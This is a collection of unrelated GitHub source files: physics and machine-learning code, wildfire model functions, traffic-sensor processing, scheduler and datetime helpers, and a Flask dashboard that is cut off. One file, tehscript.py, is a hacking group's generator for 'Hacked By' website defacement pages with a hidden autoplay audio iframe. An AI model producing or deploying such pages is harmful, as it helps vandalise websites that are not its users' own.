b19ead64eff4d47859f7a5e4e195d851e5aa0f2a | 76248f61de4008133e0f57e61be09fc6acc6bcbe | /relativipy/classes/01/Christoffel.py | b86bec96dcc9d7d9140c8cadcc7a289100f9fd4f | [] | no_license | gausstein/relativipy | dd4a5cae0aef28b6f8da8b7705ff644361890242 | 536b78c4d0efee94af1df4672e5376bffdde4c10 | refs/heads/master | 2016-09-16T14:18:03.240265 | 2011-03-11T20:51:28 | 2011-03-11T20:51:28 | 1,469,528 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 373 | py | # -*- coding: utf-8 -*-
from sympy import *
class Christoffel(object):
def __init__(self,g,x):
self.g = g
self.x = x
def udd(self,i,k,l):
g=self.g
x=self.x
r=0
for m in [0,1,2,3]:
r+=g.uu(i,m)/2 * (g.dd(m,k).diff(x[l])+g.dd(m,l).diff(x[k]) \
- g.dd(k,l).diff(x[m]))
return r
| [
"gausstein@gmail.com"
] | gausstein@gmail.com |
b0c7bff8cf1dad9863c32e34911316e8fa4be6c9 | 407818310342185f5cad9168f6f527599c01ef00 | /experiments/train.py | 8fbeabef7dbd029b89c95bf4992672f5effa1a10 | [] | no_license | liujiaming19910220/mobilenet_v2_ssdlite_keras | e1009c1bf16698b33ba5a323269defe2f8e93e86 | 778b73dfe85dc88dc436000f9e190b4925106514 | refs/heads/master | 2020-06-22T18:15:21.691949 | 2019-04-06T01:10:32 | 2019-04-06T01:10:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,969 | py | import os
import re
from keras.optimizers import Adam
from keras import backend as K
from models.keras_mobilenet_v2_ssdlite import mobilenet_v2_ssd
from losses.keras_ssd_loss import SSDLoss
from utils.object_detection_2d_data_generator import DataGenerator
from utils.object_detection_2d_geometric_ops import Resize
from utils.object_detection_2d_photometric_ops import ConvertTo3Channels
from utils.data_augmentation_chain_original_ssd import SSDDataAugmentation
from utils.coco import get_coco_category_maps
from utils.ssd_input_encoder import SSDInputEncoder
from keras.callbacks import TensorBoard, ModelCheckpoint, LearningRateScheduler
# model config
batch_size = 16
image_size = (300, 300, 3)
n_classes = 80
mode = 'training'
l2_regularization = 0.0005
min_scale = 0.1
max_scale = 0.9
scales = None
aspect_ratios_global = None
aspect_ratios_per_layer = [[1.0, 2.0, 0.5], [1.0, 2.0, 0.5, 3.0, 1.0 / 3.0], [1.0, 2.0, 0.5, 3.0, 1.0 / 3.0],
[1.0, 2.0, 0.5, 3.0, 1.0 / 3.0], [1.0, 2.0, 0.5], [1.0, 2.0, 0.5]]
two_boxes_for_ar1 = True
steps = None
offsets = None
clip_boxes = False
variances = [0.1, 0.1, 0.2, 0.2]
coords = 'centroids'
normalize_coords = True
subtract_mean = [123, 117, 104]
divide_by_stddev = 128
swap_channels = None
confidence_thresh = 0.01
iou_threshold = 0.45
top_k = 200
nms_max_output_size = 400
return_predictor_sizes = False
K.clear_session()
# file paths
train_images_dir = '/media/shishuai/C4742F9E742F926A/Resources/COCO/2017/train2017/'
train_annotations_filename = '/media/shishuai/C4742F9E742F926A/Resources/COCO/2017/annotations/instances_train2017.json'
val_images_dir = '/media/shishuai/C4742F9E742F926A/Resources/COCO/2017/val2017/'
val_annotations_filename = '/media/shishuai/C4742F9E742F926A/Resources/COCO/2017/annotations/instances_val2017.json'
log_dir = '/media/shishuai/C4742F9E742F926A/Resources/ssd_keras_logs/0320/'
# learning rate schedule
def lr_schedule(epoch):
if epoch < 200:
return 0.001
elif epoch < 500:
return 0.0001
else:
return 0.00001
# set trainable layers
def set_trainable(layer_regex, keras_model=None, indent=0, verbose=1):
# In multi-GPU training, we wrap the model. Get layers
# of the inner model because they have the weights.
layers = keras_model.inner_model.layers if hasattr(keras_model, "inner_model") \
else keras_model.layers
for layer in layers:
# Is the layer a model?
if layer.__class__.__name__ == 'Model':
print("In model: ", layer.name)
set_trainable(
layer_regex, keras_model=layer)
continue
if not layer.weights:
continue
# Is it trainable?
trainable = bool(re.fullmatch(layer_regex, layer.name))
# Update layer. If layer is a container, update inner layer.
if layer.__class__.__name__ == 'TimeDistributed':
layer.layer.trainable = trainable
else:
layer.trainable = trainable
# Print trainable layer names
if trainable and verbose > 0:
print("{}{:20} ({})".format(" " * indent, layer.name, layer.__class__.__name__))
# build model
model = mobilenet_v2_ssd(image_size, n_classes, mode, l2_regularization, min_scale, max_scale, scales,
aspect_ratios_global, aspect_ratios_per_layer, two_boxes_for_ar1, steps,
offsets, clip_boxes, variances, coords, normalize_coords, subtract_mean,
divide_by_stddev, swap_channels, confidence_thresh, iou_threshold, top_k,
nms_max_output_size, return_predictor_sizes)
# load weights
weights_path = '../pretrained_weights/ssdlite_coco_loss-4.8205_val_loss-4.1873.h5'
model.load_weights(weights_path, by_name=True)
# compile the model
adam = Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)
ssd_loss = SSDLoss(neg_pos_ratio=3, alpha=1.0)
# set_trainable(r"(ssd\_[cls|box].*)", model)
model.compile(optimizer=adam, loss=ssd_loss.compute_loss)
print(model.summary())
# load data
train_dataset = DataGenerator(load_images_into_memory=False, hdf5_dataset_path=None)
val_dataset = DataGenerator(load_images_into_memory=False, hdf5_dataset_path=None)
train_dataset.parse_json(images_dirs=[train_images_dir], annotations_filenames=[train_annotations_filename],
ground_truth_available=True, include_classes='all', ret=False)
val_dataset.parse_json(images_dirs=[val_images_dir], annotations_filenames=[val_annotations_filename],
ground_truth_available=True, include_classes='all', ret=False)
# We need the `classes_to_cats` dictionary. Read the documentation of this function to understand why.
cats_to_classes, classes_to_cats, cats_to_names, classes_to_names = get_coco_category_maps(train_annotations_filename)
# set the image transformations for pre-processing and data augmentation options.
# For the training generator:
ssd_data_augmentation = SSDDataAugmentation(img_height=image_size[0],
img_width=image_size[1],
background=subtract_mean)
# For the validation generator:
convert_to_3_channels = ConvertTo3Channels()
resize = Resize(height=image_size[0], width=image_size[1])
# instantiate an encoder that can encode ground truth labels into the format needed by the SSD loss function.
# The encoder constructor needs the spatial dimensions of the model's predictor layers to create the anchor boxes.
predictor_sizes = [model.get_layer('ssd_cls1conv2_bn').output_shape[1:3],
model.get_layer('ssd_cls2conv2_bn').output_shape[1:3],
model.get_layer('ssd_cls3conv2_bn').output_shape[1:3],
model.get_layer('ssd_cls4conv2_bn').output_shape[1:3],
model.get_layer('ssd_cls5conv2_bn').output_shape[1:3],
model.get_layer('ssd_cls6conv2_bn').output_shape[1:3]]
ssd_input_encoder = SSDInputEncoder(img_height=image_size[0],
img_width=image_size[1],
n_classes=n_classes,
predictor_sizes=predictor_sizes,
scales=scales,
aspect_ratios_per_layer=aspect_ratios_per_layer,
two_boxes_for_ar1=two_boxes_for_ar1,
steps=steps,
offsets=offsets,
clip_boxes=clip_boxes,
variances=variances,
matching_type='multi',
pos_iou_threshold=0.5,
neg_iou_limit=0.3,
normalize_coords=normalize_coords)
# create the generator handles that will be passed to Keras' `fit_generator()` function.
train_generator = train_dataset.generate(batch_size=batch_size,
shuffle=True,
transformations=[ssd_data_augmentation],
label_encoder=ssd_input_encoder,
returns={'processed_images',
'encoded_labels'},
keep_images_without_gt=False)
val_generator = val_dataset.generate(batch_size=batch_size,
shuffle=False,
transformations=[convert_to_3_channels,
resize],
label_encoder=ssd_input_encoder,
returns={'processed_images',
'encoded_labels'},
keep_images_without_gt=False)
# Get the number of samples in the training and validations datasets.
train_dataset_size = train_dataset.get_dataset_size()
val_dataset_size = val_dataset.get_dataset_size()
print("Number of images in the training dataset:\t{:>6}".format(train_dataset_size))
print("Number of images in the validation dataset:\t{:>6}".format(val_dataset_size))
callbacks = [LearningRateScheduler(schedule=lr_schedule, verbose=1),
TensorBoard(log_dir=log_dir, histogram_freq=0, write_graph=True, write_images=False),
ModelCheckpoint(
os.path.join(log_dir, "ssdseg_coco_{epoch:02d}_loss-{loss:.4f}_val_loss-{val_loss:.4f}.h5"),
monitor='val_loss', verbose=1, save_best_only=True, save_weights_only=True)]
model.fit_generator(train_generator, epochs=1000, steps_per_epoch=1000,
callbacks=callbacks, validation_data=val_generator,
validation_steps=100, initial_epoch=0)
| [
"markshih91@gmail.com"
] | markshih91@gmail.com |
c25c569f0bf38ad85fb73361adee32bed0d3ee29 | a44834bf5c18a5c11ec701b6856b567e95b67ed6 | /tehscript.py | 7d044144accded60bf930ba16e1e67651a6e0638 | [] | no_license | teh-squadcyber/tehscript | 05fa2bc629250d1b6107add04ec1b4c1efd02087 | f62d52848fb5cad795c9b079c6f53f317338712e | refs/heads/master | 2020-06-17T08:47:59.805228 | 2020-03-16T06:20:59 | 2020-03-16T06:20:59 | 195,867,863 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,709 | py | #! usr/bin/python
#TEH SQUAD CYBER {CoDay#XploiT}
import os
import sys
def teh():
os.system ('clear')
teh = """\033[1;31;40m
/`\
/ : |
_.._ | '/
/` \ | / {SCRIPT DEFACE TEH v1}
| .-._ '-"` (
|_/ / o o\ - TEH SQUAD CYBER -
| = () )=
\ '--`/
/ ---<`
| , \\ INSTAGRAM :tehsquadcyber.id
| | \\__
/ ; |.__)
(_/.-. ;
{ `| \_/
'-\ / |
| / |
/ \ '-.
\__|----' """
teh2 = """\033[1;32;40m
/`\
/ : |
_.._ | '/
/` \ | / {SCRIPT DEFACE TEH v1}
| .-._ '-"` (
|_/ / o o\ - TEH SQUAD CYBER -
| = () )=
\ '--`/ copyright (c) Syntax7 - TSC2019
/ ---<`
| , \\ INSTAGRAM :tehsquadcyber.id >
| | \\__ GITHUB :https://github.com/TEHSquadCyber
/ ; |.__)
(_/.-. ;
{ `| \_/
'-\ / | [!] SUKSES MEMBUAT >
| / | [!] FILE NAME TEH404.html >
/ \ '-.
\__|----'"""
print teh
tehtit = raw_input ("\033[1;31;40m------[$]TITLE : ")
tehnik = raw_input ("\033[1;37;40m------[$]NICK : ")
tehtim = raw_input ("\033[1;31;40m------[$]TEAM : ")
tehmes = raw_input ("\033[1;37;40m------[$]PESAN : ")
tehkon = raw_input ("\033[1;31;40m------[$]EMAIL : ")
tehgrt = raw_input ("\033[1;37;40m------[$]GREET : ")
squad = open ("TEH404.html","w")
create1 = """<html>
<head>
<link rel="SHORTCUT ICON" href="http://dev-xmen.pantheonsite.io/wp-content/uploads/2017/08/2q3abk0.jpg" type="image/x-icon"/>
<meta content='Hacked By"""
create2 = tehnik
create3 = """' name='description'/><meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcSJ17yapGqo79czdxUmWbokgbW6Psu8dMx3WW4oTT0wPWcq_g7L" />
<link href="https://upload.wikimedia.org/wikipedia/commons/thumb/a/a6/Anonymous_emblem.svg/1200px-Anonymous_emblem.svg.png" rel="shortcut icon" />
<body bgcolor="black"><title>"""
create4 = tehtit
create5 = """</title>
</style>
</head>
<div style="height: auto; min-height: 100%;">
<div style="text-align: center; width:800px; margin-left: -400px; position: absolute; top: 30%; left: 50%;">
<img src="https://4.top4top.net/p_1272yj2di0.gif">
<body>
<div align="center">
</div>
<div align="center">
<pre style="font: 50px/10px courier;"><b><br><br> <br><br><br><br><br>
<font color="white"> Hacked By <font color="red">"""
create6 = tehnik
create7 = """ </font>
</pre>
<pre style="font: 30px/10px courier;"><b>"""
create8 = tehtim
create9 = """</b></pre>
</div>
<div align="center">
<pre style="font: 20px/30px courier;"><b>"""
createa = tehmes
createb = """<i><div>
</b></pre>
</div>
<div align="center">
<pre>
<div style=?text-align:left;?>
~root@ Greetz : """
createc = tehgrt
created = """</div>
</pre>
<br> <b><font color="red" face="Ubuntu Mono" size="3"><i>Contact?<br> <font face="Ubuntu Mono" size="3" color="white"><i> """
createe = tehkon
createf = """<i> </font> </center><i><br>
<br> <b><font color="red" face="Ubuntu Mono" size="3"><i>INDONESIAN <font face="Ubuntu Mono" size="3" color="white"><i>HACKER RULEZ<i> </font> </center><i>
</pre>
</div>
</body>
</html>
<iframe width="0" height="0" src="https://2.top4top.net/m_1272o1x4o0.mp3" frameborder="0" allowfullscreen</iframe>"""
squad.write(create1)
squad.write(create2)
squad.write(create3)
squad.write(create4)
squad.write(create5)
squad.write(create6)
squad.write(create7)
squad.write(create8)
squad.write(create9)
squad.write(createa)
squad.write(createb)
squad.write(createc)
squad.write(created)
squad.write(createe)
squad.write(createf)
squad.close()
os.system ('clear')
os.system ('sleep 3')
print teh2
teh()
| [
"noreply@github.com"
] | teh-squadcyber.noreply@github.com |
99f2636f5ce820d99460c24b1d27351373900644 | f8716b6bff13bea3782480f3d2e5281d9931f970 | /wildfire/utils/functions.py | d941084b306f7da538557a350bab8c13baa9d260 | [
"BSD-3-Clause"
] | permissive | dsanmartin/ngen-kutral | 9e5af287a3a2f9a7dcb401397d3b8c98a2dc3c48 | 1024ec6a687dd673e7b38ed4f11588fa3a2eedf5 | refs/heads/master | 2022-12-06T01:53:33.824525 | 2022-11-29T05:21:13 | 2022-11-29T05:21:13 | 133,684,659 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,402 | py | """Functions utilities.
Some functions for implementation.
"""
import numpy as np
# Generic #
def G(x, y, s):
"""Gaussian kernel.
.. math::
G(x, y) = \exp(-(x^2 + y^2) / s)
Parameters
----------
x : float or array_like
x value.
y : float or array_like
y value.
s : float
Gaussian shape parameter.
Returns
-------
float or array_like
Gaussian function
"""
return np.exp(-(x ** 2 + y ** 2) / s)
# PDE FUNCTIONS #
def K(u, kap, eps):
"""Compute diffusion function
.. math::
K(u) = \kappa \, (1 + \varepsilon u)^3 + 1
Parameters
----------
u : array_like
Temperature variable.
kap : float
Diffusion parameter.
eps : float
Inverse of activation energy.
Returns
-------
array_like
Evaluation of K function.
"""
return kap * (1 + eps * u) ** 3 + 1
def Ku(u, kap, eps):
"""Derivative of K with respect to u.
.. math:
\dfrac{\partial K}{\partial u} = K_{u} = 3\,\varepsilon \kappa\, (1 + \varepsilon\, u)^2
Parameters
----------
u : array_like
Temperature variable.
kap : float
Diffusion parameter.
eps : float
Inverse of activation energy.
Returns
-------
array_like
Ku evaluation.
"""
return 3 * eps * kap * (1 + eps * u) ** 2
def f(u, b, eps, alp, s):
"""Temperature-fuel reaction function.
Parameters
----------
u : array_like
Temperature value.
b : array_like
Fuel value.
eps : float
Inverse of activation energy parameter.
alp : float
Natural convection parameter.
s : function or lambda
Step function.
Returns
-------
array_like
Reaction function.
"""
return s(u) * b * np.exp(u / (1 + eps * u)) - alp * u
def g(u, b, eps, q, s):
"""RHS of fuel PDE.
Parameters
----------
u : array_like
Temperature value
b : array_like
Fuel value.
eps : float
Inverse of activation energy parameter.
q : float
Reaction heat parameter.
s : function or lambda
Step function.
Returns
-------
array_like
Fuel RHS PDE.
"""
return -s(u) * (eps / q) * b * np.exp(u / (1 + eps * u))
def H(u, upc):
"""2D heaviside funcion
Parameters
----------
u : array_like
Temperature value
upc : float
Phase change threshold.
Returns
-------
array_like
Heaviside function evaluation.
"""
S = np.zeros_like(u)
S[u >= upc] = 1.0
return S
def sigmoid(u, k=.5):
"""Sigmoid function.
Parameters
----------
u : array_like
Temperature value.
k : float, optional
Slope constant factor, by default .5
Returns
-------
array_like
Sigmoid evaluation.
"""
return 1 / (1 + np.exp(-k * scale(u))) #0.5 * (1 + np.tanh(k * self.scale(u)))
def scale(u, a=-10, b=10):
"""Scale function.
Parameters
----------
u : array_like
Temperature value.
a : int, optional
Minimum value, by default -10
b : int, optional
Maximum value, by default 10
Returns
-------
array_like
Scaled value of u.
"""
return (b - a) * (u - np.min(u)) / (np.max(u) - np.min(u)) + a | [
"dsanmartinreyes@gmail.com"
] | dsanmartinreyes@gmail.com |
4cd128ca4c03ead4828afa4e0f796bf8d364ac49 | a1ee56f6c6dd23f4f9504300369b8f1824a51d40 | /1rdStep_getInfoNeighours.py | 7b53953e0840f87d1c793f88814825673b14b17b | [] | no_license | PENG-Tao-1985/test_git- | 10d35061cc3a78a1903495b7d496cf493daa839a | 53331fd0b4fc08b47966b7e1582004e4c4a8b90a | refs/heads/master | 2023-02-02T05:01:11.169006 | 2020-12-21T11:35:10 | 2020-12-21T11:35:10 | 323,331,871 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,310 | py | # -*- coding: utf-8 -*-
"""
本程序流程
1 读取 'trafficMetaData.csv' 文件
2 Traite函数负责将取得起始点,结束点之间均值
3 distance 计算两地之间距离
4 PointDeControleVille 根据所选城市,提取出此城市的观测点
5 TousLesVoisin 按照规则(距离,最小小邻居数目)获取本观测点和其邻居的信息
6 将5中结果存储在 'tousLesVoisinsDeTouslesPionts.npy'
"""
'''
本次关键参数:
'''
#fileDetrafficMetaData = 'trafficMetaData_simple.csv' #这是改过的,只含有11个观测点
fileDetrafficMetaData = 'trafficMetaData.csv'
villeChoisie = "Aarhus"
distanceEntreVoision = 1000
miniNumVoisin = 4
'''
读取 'trafficMetaData.csv' 文件
lecture de metadat de traffice
'''
import csv
metaDataTraffice = []
with open(fileDetrafficMetaData) as f:
f_csv = csv.reader(f)
headers = next(f_csv)
for row in f_csv:
metaDataTraffice.append(row)
'''
fonction Traite
将监测路段经度/纬度处理,从文本到浮点型可以接收的范围,然后算个均值
'''
def Traite(X,Y):
if len(X) >= 15:
X = X[0:16]
else:
for c in (0,16-len(X)):
X+"0"
if len(Y) >= 15:
Y = Y[0:16]
else:
for c in (0,16-len(Y)):
Y+"0"
return 0.5*(float(X)+float(Y))
'''
distance 输入两地经纬度,计算距离 输出单位 米
'''
import math
def distance(origin, destination):
lat1, lon1 = origin
lat2, lon2 = destination
radius = 6378.137 # km
dlat = math.radians(lat2-lat1)
dlon = math.radians(lon2-lon1)
a = math.sin(dlat/2) * math.sin(dlat/2) + math.cos(math.radians(lat1)) \
* math.cos(math.radians(lat2)) * math.sin(dlon/2) * math.sin(dlon/2)
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))
d = radius * c*1000
return d
'''
根据所选城市,提取出所有监控点的位置
输出【ID,LA,LN】
'''
def PointDeControleVille(metaDataTraffice,ville):
metaDataVille = []
for c in range(0,len(metaDataTraffice)):
if metaDataTraffice[c][16] ==ville:
# print(metaDataTraffice[c][25]+","+metaDataTraffice[c][12]+","+metaDataTraffice[c][19]+","+metaDataTraffice[c][13]+","+metaDataTraffice[c][5])
metaDataVille.append([metaDataTraffice[c][20],metaDataTraffice[c][12],metaDataTraffice[c][19],metaDataTraffice[c][13],metaDataTraffice[c][5]])
F = lambda a:(a[0],Traite(a[1],a[3]),Traite(a[2],a[4]))
re = F(metaDataVille)
# metaDataVille = map(lambda (a):([int(a[0]),Traite(a[1],a[3]),Traite(a[2],a[4])]),metaDataVille)
return re
ponitTraffic = PointDeControleVille(metaDataTraffice,villeChoisie)
'''
输入 moi 自己所在点【ID,LA,LN】,
输入 Doc 即监控点ID和位置信息
输入 邻居范围
输出 邻居列表 【ID,LA,LN】
第一个位置表示自己, 即 自己 + 邻居
'''
def VoisinDePoint(moi,Doc,Dis):
MoiLA = 0
MoiLON = 0
listVoisin = []
for c in range(0,len(Doc)):
if Doc[c][0] == moi:
MoiLA = Doc[c][1]
MoiLON = Doc[c][2]
listVoisin.append([moi,MoiLA,MoiLON])
for c in range(0,len(Doc)):
if Doc[c][0] != moi and distance([MoiLA,MoiLON],[Doc[c][1],Doc[c][2]])<Dis:
listVoisin.append(Doc[c])
return listVoisin
'''
输入 pt 即所有节点信息,对应 ponitTraffic
输入 dis 距离
输出 [本节点,+若干邻居节点列表]
'''
def TousLesVoisin(pt,dis):
resultat = []
for c in range(0,len(pt)):
temp = VoisinDePoint(pt[c][0],ponitTraffic,dis)
if len(temp[1:]) <= miniNumVoisin:
temp = VoisinDePoint(pt[c][0],ponitTraffic,dis*3)
if len(temp[1:]) <= miniNumVoisin:
print (temp[0])
# resultat.append([temp[0][0],dis,len(temp[1:]),map(lambda a:a[0],temp[1:])])
resultat.append(map(lambda a:a[0],temp))
return resultat
tousLesVoisinsDeTouslesPionts = TousLesVoisin(ponitTraffic,distanceEntreVoision)
'''
需要描述一些邻居节点信息
1 多少观察节点,
2 邻居数据均值,最大值,最小值
'''
def discription(info):
numVoisions = map(lambda a:len(a),info)
chiffre = [len(numVoisions),np.average(numVoisions),np.max(numVoisions),np.min(numVoisions)]
print ['nombreux','moyenne','max','min']
print (chiffre)
discription(tousLesVoisinsDeTouslesPionts)
'''
#X,Y 黑点表示,全部Aarhus的点
#'''
#X = map(lambda (a):(a[1]-56),ponitTraffic)
#Y = map(lambda (a):(a[2]-10),ponitTraffic)
#'''
#lvX lvY自己和邻居的点 红色 蓝色
#'''
#lvX = map(lambda (a):(a[1]-56),listVoisin)
#lvY = map(lambda (a):(a[2]-10),listVoisin)
#import matplotlib.pyplot as plt
#
#plt.xlim()
#
#plt.xlim(min(X)*0.99, max(X)*1.01)
#plt.ylim(min(Y)*0.99, max(Y)*1.01)
#
#plt.plot(X,Y,'ko')
#plt.plot(lvX[1:],lvY[1:],'bo')
#plt.plot(lvX[0],lvY[0],'ro')
##plt.plot(listVoisin[2:][1],listVoisin[2:][2],'bo',label="point")
##plt.plot(listVoisin[0][1],listVoisin[0][2],'ro',label="point")
#plt.legend()
#plt.show()
'''
'''
import numpy as np
import csv
#csvfile = file('listVoisin.csv', 'wb')
#writer = csv.writer(csvfile)
#writer.writerow(['rapportID','LA','LON'])
#writer.writerows(listVoisin)
#csvfile.close()
np.save('tousLesVoisinsDeTouslesPionts.npy',tousLesVoisinsDeTouslesPionts)
| [
"jy02407380@gmail.com"
] | jy02407380@gmail.com |
f7134ab899e5626e209759210f286d569054a216 | a910ad156f76b5de7061f63da12e19de43be406d | /systran_resources_api/models/dictionaries_list_response.py | 2c1cc63989b18587501f760b7a6b16fabf2b941e | [
"Apache-2.0"
] | permissive | yingfei0913/resources-api-python-client | efdf1b05831fc78d266ee09412bf8256ebcfd218 | c1640a6ff81f7774d3c0cf02ddb28a412f7a027b | refs/heads/master | 2021-05-31T20:34:20.904274 | 2016-08-09T09:19:59 | 2016-08-09T09:19:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,906 | py | #!/usr/bin/env python
# coding: utf-8
"""
Copyright 2015 SYSTRAN Software, Inc. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class DictionariesListResponse(object):
"""
NOTE: This class is auto generated by the systran code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
Systran model
:param dict systran_types: The key is attribute name and the value is attribute type.
:param dict attribute_map: The key is attribute name and the value is json key in definition.
"""
self.systran_types = {
'total_no_limit': 'int',
'dictionaries': 'list[DictionaryOutput]'
}
self.attribute_map = {
'total_no_limit': 'totalNoLimit',
'dictionaries': 'dictionaries'
}
# Number of dictionaries without skip/limit filter
self.total_no_limit = None # int
# List of dictionaries
self.dictionaries = None # list[DictionaryOutput]
def __repr__(self):
properties = []
for p in self.__dict__:
if p != 'systran_types' and p != 'attribute_map':
properties.append('{prop}={val!r}'.format(prop=p, val=self.__dict__[p]))
return '<{name} {props}>'.format(name=__name__, props=' '.join(properties))
| [
"nguyendc@systran.fr"
] | nguyendc@systran.fr |
1c2c9c2b5cd114cf7f5b45215070474a1c0c009c | 8c9acb401907ab97a24e85290459db209f56b2e9 | /Task.py | 36b0db8abd1b01151fa42e22e70022677d0aacb6 | [
"Apache-2.0"
] | permissive | Daudxu/taskScheduler | 141570d4427091d7dcb9cba886ef4eee59a57f26 | cd3f6f97b8f94ce42372f65a8557f83468be2395 | refs/heads/master | 2020-09-30T20:47:06.192713 | 2020-07-18T07:13:23 | 2020-07-18T07:13:23 | 227,370,084 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | import time
from taskModel import taskJobModel
from apscheduler.schedulers.blocking import BlockingScheduler
def func():
ts = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
taskObj = taskJobModel('husike')
taskObj.bark()
# res = taskObj.autoCancelOrder()
# print('do func time :',ts)
# print(res)
print('自动确认发货定时任务-时间:', ts)
# time.sleep(2)
def func2():
# 耗时2S
ts = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
print('do func2 time:', ts)
time.sleep(2)
# 自动取消订单
def dojob():
# 创建调度器:BlockingScheduler
scheduler = BlockingScheduler()
# 添加任务,时间间隔2S
scheduler.add_job(func, 'interval', seconds=2, id='test_job1')
# 添加任务,时间间隔5S
# scheduler.add_job(func2, 'interval', seconds=3, id='test_job2')
scheduler.start()
dojob() | [
"875126243@qq.com"
] | 875126243@qq.com |
8ea08f6a84070e59475e3de8786df6296cbdddd9 | a989ff888d86eaad7d3572993d89af17bb29c7ec | /kartverket_stormsurge/helper/datetimes.py | 981e44efed210c6a738f00d83a0f60092b15ec65 | [
"MIT"
] | permissive | jerabaul29/kartverket_storm_surge_data | 8f873232a3aff92f07a73220e51f8385278a029a | 9a35492550ec8b3f4c0b7f1d17bf3bb4776f2c49 | refs/heads/master | 2023-01-31T02:17:34.834755 | 2020-12-15T10:30:54 | 2020-12-15T10:30:54 | 287,529,304 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,229 | py | import datetime
import pytz
from kartverket_stormsurge.helper.raise_assert import ras
def assert_is_utc_datetime(date_in):
"""Assert that date_in is an UTC datetime."""
ras(isinstance(date_in, datetime.datetime))
if not (date_in.tzinfo == pytz.utc or
date_in.tzinfo == datetime.timezone.utc):
raise Exception("not utc!")
if date_in.tzinfo == pytz.utc:
print("prefer using datetime.timezone.utc to pytz.utc")
def assert_10min_multiple(date_in):
"""Assert that date_in is a datetime that is a
multiple of 10 minutes.
"""
ras(isinstance(date_in, datetime.datetime))
ras(date_in.second == 0)
ras((date_in.minute % 10) == 0)
ras(date_in.microsecond == 0)
def datetime_range(datetime_start, datetime_end, step_timedelta):
"""Yield a datetime range, in the range [datetime_start; datetime_end[,
with step step_timedelta."""
assert_is_utc_datetime(datetime_start)
assert_is_utc_datetime(datetime_end)
ras(isinstance(step_timedelta, datetime.timedelta))
ras(datetime_start < datetime_end)
ras(step_timedelta > datetime.timedelta(0))
crrt_time = datetime_start
yield crrt_time
while True:
crrt_time += step_timedelta
if crrt_time < datetime_end:
yield crrt_time
else:
break
def datetime_segments(datetime_start, datetime_end, step_timedelta):
"""Generate a succession of segments, that cover [datetime_start; datetime_end].
The segments will have length step_timedelta, except possibly the last segment
that may be shorter."""
assert_is_utc_datetime(datetime_start)
assert_is_utc_datetime(datetime_end)
ras(isinstance(step_timedelta, datetime.timedelta))
ras(datetime_start < datetime_end)
ras(step_timedelta > datetime.timedelta(0))
crrt_segment_start = datetime_start
crrt_segment_end = crrt_segment_start + step_timedelta
while True:
if crrt_segment_end >= datetime_end:
yield (crrt_segment_start, datetime_end)
break
else:
yield (crrt_segment_start, crrt_segment_end)
crrt_segment_start += step_timedelta
crrt_segment_end += step_timedelta
| [
"jean.rblt@gmail.com"
] | jean.rblt@gmail.com |
c13a2b0d141bee4a20c7232dee4588ebe627c68d | d45721f15b0e62acbab0a293c7dd464c4651804f | /app.py | 9baa0218d72e9172b292e53edb56536c740b05dc | [] | no_license | zhenqiu/iotea | 40875776e39760937c458660fb4bf8e2b412eae5 | af25d535f8c7d470c532ded597323c433a878cbf | refs/heads/master | 2020-03-22T19:30:35.013820 | 2018-07-11T06:31:50 | 2018-07-11T06:31:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,047 | py | from flask import Flask,request,url_for,render_template,redirect,jsonify
import json,db,threading,time,datetime
#loriot
app=Flask(__name__)
@app.route('/')#iotea
def index():
return render_template('index1.html')
@app.route("/sendjson", methods=['GET','POST'])
def sendjson():
data = db.readMax()
t = {
'Data': [data[0][5], data[0][6], data[0][10], data[0][8], data[0][11], data[0][9], data[0][12], data[0][13]]
# { Temperature, Humidity, Illumination, Carbon Dioxide, Oxygen, Dust, soil_temp, soil_hum }
}
# print(t)
send = json.dumps(t)
return send
@app.route("/initday", methods=['GET','POST'])
def initday():
anchorDay = []
DateDay = []
TemperatureDay = []
HumidityDay = []
IlluminationDay = []
CarbonDioxideDay = []
OxygenDay = []
DustDay = []
SoilTempDay = []
SoilHumDay = []
# data = db.readMax()
days = beforeDays(1)
# today = str(datetime.date.today())
# 显示的坐标轴锚点
# anchorDay.append({'value': [str(days[0])[5:] + " 00:00:00", 0]})
# anchorDay.append({'value': [today[5:] + " 00:00:00", 0]})
utc_dt = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc)
bj_dt = utc_dt.astimezone(datetime.timezone(datetime.timedelta(hours=8)))
year = str(bj_dt.year)
month = ""
day = ""
if int(bj_dt.month) < 10:
month = '0' + str(bj_dt.month)
else:
month = str(bj_dt.month)
if int(bj_dt.day) < 10:
day = '0' + str(bj_dt.day)
else:
day = str(bj_dt.day)
today = "%s-%s-%s" % (year, month, day)
QueryTime = []
for day in days:
for hour in range(0, 24):
if hour < 10:
QueryTime = [str(day), '0' + str(hour)]
else:
QueryTime = [str(day), str(hour)]
old = db.readMinMinute(QueryTime)
if not old:
QueryTime = [str(day), str(hour)]
old = db.readMinMinute(QueryTime)
try:
date = str(day)
date = date[:4] + '/' + date[5:7] + '/' + date[8:]
moment = date + ' ' + old[0][2] + ':' + old[0][3] + ':' + old[0][4]
# moment = str(hour)
# {value: ['2016/12/18 6:38:08', 80]}
DateDay.append(str(hour))
TemperatureDay.append({'name': moment, 'value': [str(hour), old[0][5]]})
HumidityDay.append({'name': moment, 'value': [str(hour), old[0][6]]})
